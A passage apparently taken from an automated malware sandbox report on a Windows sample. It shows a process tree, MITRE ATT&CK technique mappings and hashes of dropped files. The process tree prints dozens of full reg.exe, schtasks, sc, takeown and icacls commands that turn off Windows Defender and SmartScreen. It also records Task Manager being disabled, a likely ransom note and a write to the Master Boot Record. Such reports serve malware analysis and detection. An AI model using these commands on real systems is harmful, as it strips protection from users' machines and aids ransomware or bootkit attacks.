    PID:6536
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:6652
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:7216
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
    3⤵
    PID:7248
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /
    3⤵
    PID:7260
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:7288
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
    3⤵
    PID:7300
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:7320
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:7340
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
    3⤵
    PID:7364
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
    3⤵
    PID:7380
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:7396
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    PID:7424
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    PID:7436
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    PID:7464
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    PID:7476
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
    3⤵
    PID:7508
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    PID:7520
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:7544
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    PID:7564
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:7580
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:7604
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:7624
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:7648
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:7668
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:7700
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:7724
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:7756
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:7788
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    PID:7820
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    PID:7852
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:7864
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:7880
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:7908
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:7920
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:7944
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:7964
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:7996
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:8028
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:8060
- - C:\Windows\system32\sc.exe
    sc config webthreatdefsvc start= disabled
    3⤵
    - Launches sc.exe
    PID:8084
- - C:\Windows\system32\sc.exe
    sc config webthreatdefusersvc start= disabled
    3⤵
    - Launches sc.exe
    PID:8108
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
    3⤵
    PID:8140
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /v /t REG_DWORD /d "0" /f
    3⤵
    PID:8164
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /v /t REG_DWORD /d "0" /f
    3⤵
    PID:8188
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f
    3⤵
    PID:7176
- - C:\Windows\system32\takeown.exe
    takeown /s REZNRPAV /u Admin /f "C:\Windows\System32\smartscreen.exe"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:6652
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:7248
- - C:\Windows\system32\taskkill.exe
    taskkill /im smartscreen.exe /f
    3⤵
    - Kills process with taskkill
    PID:7224

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:1080

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C4 0x00000000000004DC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:2660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\sex.exe
1⤵
PID:6992
- C:\Windows\System32\sex.exe
  C:\Windows\System32\sex.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  PID:5996
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FA64.tmp\FA65.tmp\FA66.bat C:\Windows\System32\sex.exe"
    3⤵
    - Drops file in System32 directory
    - Modifies registry class
    PID:6588
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /f /d 1
      4⤵
      PID:6660
  - - C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\system32\ajae.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:7004
  - - C:\Windows\system32\timeout.exe
      timeout 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:7052
  - - C:\Windows\system32\timeout.exe
      timeout 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:7644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\sex.exe
1⤵
PID:6824
- C:\Windows\System32\sex.exe
  C:\Windows\System32\sex.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  PID:4284
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FAB2.tmp\FAB3.tmp\FAB4.bat C:\Windows\System32\sex.exe"
    3⤵
    - Drops file in System32 directory
    PID:6372
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /f /d 1
      4⤵
      PID:6920
  - - C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\system32\ajae.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:5892
  - - C:\Windows\system32\timeout.exe
      timeout 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:7016
  - - C:\Windows\system32\timeout.exe
      timeout 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:7736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\N3OS3X3R\mbr.exe
1⤵
PID:1560
- C:\Windows\N3OS3X3R\mbr.exe
  C:\Windows\N3OS3X3R\mbr.exe
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - System Location Discovery: System Language Discovery
  PID:6340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c player.vbs
1⤵
PID:3120

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.9\protocols.json

Filesize
3KB

MD5
f9fd82b572ef4ce41a3d1075acc52d22

SHA1
fdded5eef95391be440cc15f84ded0480c0141e3

SHA256
5f21978e992a53ebd9c138cb5391c481def7769e3525c586a8a94f276b3cd8d6

SHA512
17084cc74462310a608355fbeafa8b51f295fb5fd067dfc641e752e69b1ee4ffba0e9eafa263aab67daab780b9b6be370dd3b54dd4ba8426ab499e50ff5c7339

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
8272581d8cb38484cc8cb6afbdd0d37e

SHA1
2baa96a0439003aabaad1ce5619ea0a581cf261a

SHA256
025356bf819ea8a5da44ac2c4510bc380a9448247a30665577430ca7a44ca297

SHA512
60574186c595b0018d9223afd38e59378b1b00ef4f39be17ef2d7613cdac5b8f9e6dc3f2efefd559a0e4e8d64884d6ea155e874df13f170bb6dfbb41a0104959

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006e

Filesize
38KB

MD5
9436affc97843765a966b3568fa7e5ec

SHA1
7bfda74bb30589c75d718fbc997f18c6d5cc4a0b

SHA256
7165713d3e1a610399471a5e93d5677508f62ef072c1151e72273bf4bd54f916

SHA512
473ec3a843c33e18d6d194651fe11353fcd03a7959225faeabf8c77484155ea6a7bccb72dbaf2093ed53c408faa3be9f6fc907f7a5ddf8223375f9d09b504456

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000070

Filesize
72KB

MD5
7b85ce6d64312e6f0d8f712897a45a66

SHA1
431224de66f74e70ae5b37a67260b795352861eb

SHA256
03a79fc56e2b58121ca2fe5938be882582ca7c26cc4208ebf777de6220f59fe1

SHA512
b22d7680c82a5a45d0094dc16b0983ff59c5e3e0567d2854be14cde6a56af63729a1c4e041223fe26569e92961c49a80d603136e88d60f8f7b78ca1999b4fb3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000076

Filesize
24KB

MD5
87c2b09a983584b04a63f3ff44064d64

SHA1
8796d5ef1ad1196309ef582cecef3ab95db27043

SHA256
d4a4a801c412a8324a19f21511a7880815b373628e66016bc1785a5a85e0afb0

SHA512
df1f0d6f5f53306887b0b16364651bda9cdc28b8ea74b2d46b2530c6772a724422b33bbdcd7c33d724d2fd4a973e1e9dbc4b654c9c53981386c341620c337067

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000b1

Filesize
78KB

MD5
4e180b9efa5503ffb8bf5c828869abe6

SHA1
83a52d046098cc4c978a85dd8fe492f9dfb1357b

SHA256
2400ffe0da30f3e847d26987b384d9e85ad58f8de8376373c179b5f35cccb40f

SHA512
814be8cfb35ae8240210423c7a5dfc28f69dfb91306597d1963a1dca26deae7307550c8d5954ab54ed59f253a50c3ae11d09e546f3fa26fb9ebaa292aed2ba8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\211aa875400559ce_0

Filesize
293KB

MD5
ee41ea537cfcb75467f58491f69d3c9e

SHA1
5260268ffb7e81136f83a9912d804cafbcbd9d35

SHA256
fd46c4ee76ade3af13dcf2b1ba924e3dfa239165c0cdbfbd2898a8a7713e18db

SHA512
45cb9d7cdde3563cda089ccd4be02bdd4350c99af1a8c56708015b738bf06f4d6e9448e663db774f56031a493d0794e20c5300f839032d9d241739495ab4b770

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5df8a8568ef955f3_0

Filesize
293KB

MD5
f25435984024755b98b3a5ccfd1b8b54

SHA1
590f292779c071e45af93dcc3c30cb735c96f892

SHA256
ac8956f32bb9b2cea925b029596bc822f734c2a9e9d3a6df4dcc26f9ac5c493c

SHA512
699842f390aa1286e3664dcb226543a403e09f07a95761ed98236c15372304e409077403b924c3f26209964a51ea84873e038d95d5b4eb4000e6bffd17e30a08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7404f0e70da26768_0

Filesize
352B

MD5
14a3562e05baea8909e91fc50e75497a

SHA1
8accec27e757f5aa89117e78af8a050254eb46bd

SHA256
790ed2abf98e8def207db886cc4757b5ecc2bb05cdb29c29fbffa179558c11e4

SHA512
19ae46541f100afce30a063b41987cda3c8003183a9a2808da3ab43dbc704da1cbd797e61d3569d696f7cf3d8ddce8af8258e0e2342a0dd891755f732b513e10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d1f43acd8cdfd266_0

Filesize
351B

MD5
c02d21b93a3ae53964d2838bf81c2e49

SHA1
2f301bde9858acf441e091013314d59e617ccad7

SHA256
3ab53ff41a4eb2bf8d13c9438853f386206fd4b9de49e884dc7811a1a51084f5

SHA512
d801e1b54ea4573d9bce0efde94526572bf2b74cdb07bded71ca2dc9227fbf4c0a4dc937e510570e8df61cccfee34003c0c60fe7709fd7205badc6b5b2fb1ca4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

Filesize
107KB

MD5
40e2018187b61af5be8caf035fb72882

SHA1
72a0b7bcb454b6b727bf90da35879b3e9a70621e

SHA256
b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

SHA512
a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
10KB

MD5
85173bfb0ad9b8d21d52c33d67be7417

SHA1
a1fdcb5bf582adc488dbda035e90a587a6c339d6

SHA256
f255e8fba7b6842d028de68f32ef62d0397fb6ca189f17e51218cdeadc674bdb

SHA512
f6ff791403dd08f77442a762224fbe09173b28e8acf2264f61760a5f54ff0d840a3ecfc4331485bed0b90e9e877d3cdb0bbbe59b850d504a6d5b00636b4c168f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
18KB

MD5
d3799d768b4a1a7fefe77a1db21be682

SHA1
28310ec285dc907d28ccd58b2eef58eb12cf9d89

SHA256
9193f332fb20c8b652e7849489b369602939dd670889256a0c5c666c62405632

SHA512
3c01eb8880d0a4e674b4c7b9f62fffe68a844f5bdb903c6ed966bb2fccce113a62355268b6bdf64c532056d14fa06d03bd605165304bc6e98a21cf947de1737a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
37KB

MD5
910c0f6bf8db7c733f8bf83e1c6036da

SHA1
1cda971a1dcf6c6abbd1bbc4a02555932b4f91f3

SHA256
eff46e4cb66ebf9e1c573b8f5e153be402301d642be5c68d775cc12cb668f2d3

SHA512
1b46b6a85e6d1b37e0a8e1cbb1a22e8456d5233e6ca8aa9ea0e4a5c4ca369e31b021a050c14b922e985e9ece3f3925aa66eb2bc4fa2e4db41ebc48290a33fb52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
22KB

MD5
75cd301a79d6213f7b70b6b2982ab39a

SHA1
107bf4c7575247526f4665877fed68bb3d77112e

SHA256
3343162bce65513e6df14dfb669a65a7967d6850b65f77c0f88f0ac1cc8e2bc0

SHA512
2e14930f6660af1102e13137924a0fc9237dfdf548e75984fb7c4e8503f53fd73398f443dbddfd9478119c358d8ebf80c7432cc6bcf32bdcc65e963ee5e19f5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\4abb297f-dd3d-4f23-a051-1b6072454319.tmp

Filesize
892B

MD5
cd4c9f35544ec3ea59a1cd51093924aa

SHA1
4706fb4639020639f5090e65db9ab9933684e425

SHA256
6c37a3da8dcfa1cb09731a172568bde60daa1f73cd0f5a5edb1ac8d1c69f826b

SHA512
c7062cbd226920d6dd488f0bcddd8141ac296b011c5c894fedc5180d193782346bc1cf2808ffeab3bc3d7f46b59e7a0f912fb7400edb6fe0b7a576708fbbcb32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
463B

MD5
cd96dc93651804d31ebf3ae58c4ae33c

SHA1
dd3aed8e904085769d5c864c84ee27a0920b99a1

SHA256
c1dcac081cba9f5c1f52f9ca434f8af9aef56ad4c5efb2df99e47192a78b8311

SHA512
bbe0445177c594ec99d9e5826acf4eb43d5ff827ed94282c94f67f9a5064ef154801147ee8fd6c25fee789687ee7df87c8992e34bcc7096a2782a2b3c8e53b79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
23KB

MD5
3ed14f0f27c0ab125aef8c3d40e03899

SHA1
0cdf6c4e36f47cc2e9496d3b1fd7b87c24be89fd

SHA256
658d37e6570df19762f4338b091775f5e24eb047e234537f758d2f456aa718e5

SHA512
a562e182345d5395d219fdf5f411f2b6f25366853d6fc25904ee838dfc92ce1a7ed3671cc28b0a9f2b6c10467cc8278d2ea59c43b38e242098bd51e7e8961f54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\a8db60af-8dd8-47ee-9c98-a6e736fb3a42.tmp

Filesize
19KB

MD5
41c1930548d8b99ff1dbb64ba7fecb3d

SHA1
d8acfeaf7c74e2b289be37687f886f50c01d4f2f

SHA256
16cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502

SHA512
a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
55KB

MD5
4f4756afde319d14d49acf957a59327d

SHA1
c8aa02c5d33d0c5a67a7b155132c95b556c6f5cd

SHA256
1e119b08878c5e0b84ec4a6be3f1d8da8d4e5350e4de98447bb6d939e28d1605

SHA512
b43461ec11456564e6144e1e4a962e4fb444afd52884383672fa3b49d686c6be5695ae3997ac0e7a98813fe3e6c70ddae5a17e81f37a2a076f8551467da9574c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
41KB

MD5
0fd09f51dd6c6640897c377a2217a453

SHA1
327be4c807c231ef20fe8f3fd267f6d4c612bab8

SHA256
2fbbe0386bfa6dd25992c042ca5b90acc3b95b0b6267c99960f3817f97d19d59

SHA512
31b8104f69b181cdaa3029dbeb93b8a65e4690ba6024fe46ac677191309b49eced54094d392959e181958cd6fbace092e73af05525a26805f6054ddef8976115

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
41KB

MD5
cb6e1a65a59afafefa36ad9ad09eaf1e

SHA1
41ba3f9e52a6018036fbb94bfb3db419fe8c6480

SHA256
8ef81ff25410db612440349cb23b0b09c5b4a7935c7058603625c375d3b5822f

SHA512
1c366c1504b69f91e0aefaefee477a07b4bba7d4ef36cd953d823ed0953eef57ad1a367538a659c446682a5bfb246ba48f842ba2205c18f58d97db2766fdc065

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
58a3b03423eb04c83eb288ee5f714806

SHA1
900a3d8990479feb811afcfb51e5e87de160c72d

SHA256
14b8c15bb7dbeabdc90d34b7d3fd00c0e746d889a5abaef067fb64b98c55f210

SHA512
81df3af17f7d26b72b5a7fdca12caa2f9adee01132fd3b7df4285199fe125c9e494643c395c5983648f09161c13fe323d9ba78bda1c241cda8ef85abb9084b62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
d7f76bac141140e2a6fc535d22390cc6

SHA1
f71ee4d604e0031db6ccdb9852243e377db2f507

SHA256
be5bc6418246513a93da84b21d8b612f34f7de3d972e2151f485a0abe9fbe8c6

SHA512
19a8f8a961b4bec656b91d2c3e72052b7ec9ae1a775a82caec7913a13726017558e2479964c8003c6eb1ecae801ca2ab9458feb784d6c99e8eb00022fc56e8e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
a99725daa46d3e14fb7d737861a27104

SHA1
9b5293a6850be14000d795c234c466cd20f6dab1

SHA256
fd8dd26e81488d1c3c2686dbf6273f3d27c213520d7935322ba272ab622ffa61

SHA512
4fd17a76b5ab5437e65f5c062bc1e260c678f524fc200bae148382b647e92767fae93c6b304b6f6af1f0c55d4eeceb06d7d06a54ee9cd8047066b98eafd88e5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
388e4f3d29e763be35b6fc8c601f4215

SHA1
6451126f33961a63dd0ddf09ed9230804ec924b7

SHA256
ee1741046aa27ac99063517532a7f51d517b854dd4a161b5f65c5ee54bae44c7

SHA512
cb4f7e56aeb40ead7aa955add6ed8330a46c560241dd4a7a76b99b81b610a0c5b772e3b5b2bd2cf6a7eec30aa6fe4599aa135908851cebf14df04837cc83a305

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
f5f7fe109025e784b2e71daf44619709

SHA1
0abea292f05fc9021f4f1c1f386b236b10cee8fc

SHA256
681c43e4f2461fc6be3889a6a2cc264358d033ebde1a02b66b1043e9ef339e81

SHA512
260d8cc960a3a7941b2760f7d0242681a00e3e896e1679f9fe63a7943f1a602c192a867bfb17ebda8129efa435eeba9be50613482b571236a963ab6a51204965

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
93db0052df3e7446335cff62e416b543

SHA1
6af00296b3736b10f9e46a114b349de028b661e0

SHA256
d29269adba3b1dd8320c44814c06fae052df8540670340f1142a625517a5fc8d

SHA512
6ac0e5243cf8fb24443c99ed21c559d111125394ea9ebc28cac1e378646ca58607ebff3d7d14b332318448dec03e9c38044b50b9192d5db685757a98a765acff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
3b29a9ac7c3c775d9af4848eb582671b

SHA1
9e9d036ccf35e645a34f06f520e0526fe99bf03a

SHA256
557baecdc9d4cadf71153f7d1b8b2f5b7ade9a9b6087c55d2e844d55b11420fa

SHA512
